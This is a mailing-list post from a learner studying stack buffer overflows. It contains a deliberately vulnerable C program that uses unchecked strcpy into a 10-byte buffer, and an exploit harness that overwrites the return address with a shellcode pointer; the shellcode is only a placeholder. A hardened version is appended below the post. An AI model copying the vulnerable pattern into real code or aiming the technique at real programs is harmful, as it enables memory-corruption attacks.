Vulnerability Development mailing list archives
Re: Re: understanding buffer overflows
From: secacc7 () hotmail com
Date: 2 Nov 2007 08:35:57 -0000
Thx.. this was a great example. Yesterday I posted a reply with a different email address, so I think it was not accepted. I edited your example as follows (maybe it was a bit different, I'm now at work..)

vuln.cpp:

    #include <stdio.h>
    #include <string.h>

    int foo(char *a)
    {
        char buffer[10];
        strcpy((char *)buffer,a);
        return 0;
    }

    int main(int argc, char * argv[])
    {
        foo(argv[1]);
        return 0;
    }

test.cpp:

    #include <stdio.h>

    int main()
    {
        char shellcode[]="Your provided shellcode";
        printf("Address of Shellcode:%p\n",&shellcode);
        char buffer[20];
        //to put the address of shellcode at the correct position of buffer (I have stack randomization on, I think, so it's not static) - in my case I think it was "14"
        //don't know the correct conversion:
        *(long *)&buffer[14]=(long *)&shellcode;
        execlp("./vuln", "vuln", buffer, NULL);
    }

And this worked fine: after executing (./test) I get a result like this:

    Address of shellcode: 0xbffff0c0

and gdb says too that eip points to 0xbffff0c0. I think this looks good - does it? Anyway, I didn't get a new instance of the shell. I think maybe the shellcode hasn't worked.

greets
michael!
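For contrast with the posted vuln.cpp, a bounds-checked counterpart of foo() follows. It is an added example, not part of the original message or thread; the names foo_checked and BUF_LEN are assumptions introduced here.

```c
#include <stdio.h>
#include <string.h>

#define BUF_LEN 10  /* same size as buffer[] in the posted vuln.cpp */

/* Hypothetical hardened counterpart of foo(): returns 0 on success and
 * -1 when the input is missing or would not fit with its NUL byte. */
int foo_checked(const char *a, char *out, size_t out_len)
{
    size_t n;

    if (a == NULL || out == NULL || out_len == 0)
        return -1;  /* vuln.cpp passes argv[1] on even when it is absent */

    /* Measure the input without ever reading more than out_len bytes. */
    for (n = 0; n < out_len && a[n] != '\0'; n++)
        ;
    if (n == out_len)
        return -1;  /* too long: reject rather than overflow or truncate */

    memcpy(out, a, n);
    out[n] = '\0';
    return 0;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_LEN];

    if (argc < 2 || foo_checked(argv[1], buffer, sizeof buffer) != 0) {
        fprintf(stderr, "usage: %s <string of at most %d bytes>\n",
                argc > 0 ? argv[0] : "vuln", BUF_LEN - 1);
        return 1;
    }
    printf("copied: %s\n", buffer);
    return 0;
}
```

With this check the 20-byte argument built by test.cpp is refused before any copy takes place, so the saved return address is never overwritten.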